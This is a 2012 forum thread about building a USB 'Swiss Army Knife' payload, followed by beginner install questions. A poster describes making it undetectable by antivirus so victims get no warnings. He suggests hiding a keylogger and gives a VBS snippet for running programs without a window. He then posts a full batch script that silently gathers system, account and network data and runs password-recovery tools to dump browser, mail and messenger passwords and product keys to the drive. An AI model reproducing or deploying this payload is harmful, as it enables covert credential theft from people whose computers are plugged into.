iknuts

March 19, 2012

No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs.

GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey).

Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder.

Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window.
CreateObject("Wscript.Shell").Run """" &amp; WScript.Arguments(0) &amp; """", 0, False
Also, making something similar to USB 3.0 (so AVs can't delete files):

Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software.

:P What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb.

batch file for payload:

@echo off

:: Thanks to GuidoZ for the template idea.

:: I don't know who originally made this forensics, but it has been upgraded over time by me.

:: Setting Log File Location

SET logdir="%1\logs\%computername%"

IF NOT EXIST %1\logs\%computername% (

MD %1\logs\%computername%

)

:: Adding an ignore for your own computer

IF EXIST "%systemroot%\safe.dat" goto End

IF NOT EXIST "%systemroot%\safe.dat" goto INFO

:INFO

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

ECHO + + >> %1\logs\%computername%\info.txt

ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt

ECHO + + >> %1\logs\%computername%\info.txt

ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

goto LOCALACCTS

:LOCALACCTS

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt

net users >> %1\logs\%computername%\localaccts-%computername%.txt

echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt

psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt

echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt

net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt

echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt

net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt

goto LOCALNET

:LOCALNET

ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt

ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt

echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt

ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt

echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt

arp -a >> %1\logs\%computername%\localnet-%computername%.txt

echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt

netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt

echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt

route print >> %1\logs\%computername%\localnet-%computername%.txt

echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt

type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt

echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt

echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt

netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt

echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt

net use >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt

goto SYSINFO

:SYSINFO

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt

pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt

tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [state of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt

sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt

gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt

driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [system Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt

set >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO + [startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER

reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt

goto ERRORLOG

:ERRORLOG

ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

ECHO + [system Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt

ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt

ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

REM Grab Sytem Error Log for Review (Error ONLY)

cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt

REM Grab Application Error Logs for Review

cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt

goto PORT

:PORT

ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

goto MD5

:MD5

ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt

md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt

md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt

md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt

goto MDINFO

:MDINFO

IF NOT EXIST %1\logs\%computername%\userinfo (

MD %1\logs\%computername%\userinfo\

)

goto MDPASS

:MDPASS

IF NOT EXIST %1\logs\%computername%\userinfo\pass (

MD %1\logs\%computername%\userinfo\pass\

)

goto IEFIREHIST

:IEFIREHIST

:INFO

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt

START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt

START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [Dump Messanger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

goto END

:END

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

START EXPLORER.EXE

exit

i jus downloaded the Ghostpad... how do i install(sorry if i annoy you with my newbie questions)

March 19, 2012

Hi guys... i still have know idea how to install this... i realize its been 3years since anyone responeded to this topic, but i'm hoping someone can help me out.

my USB is NON U3, i've got the payload, but everytime i run the menu.bat and try and enable modules, the command result is 'File not found'... what am i doing wrong?

thanks

Sign In

iknuts

Posts

Joined

Last visited

Content Type

Profiles

Forums

Posts posted by iknuts

USB Pocket-Knife Development

USB Pocket-Knife Development

Browse

Activity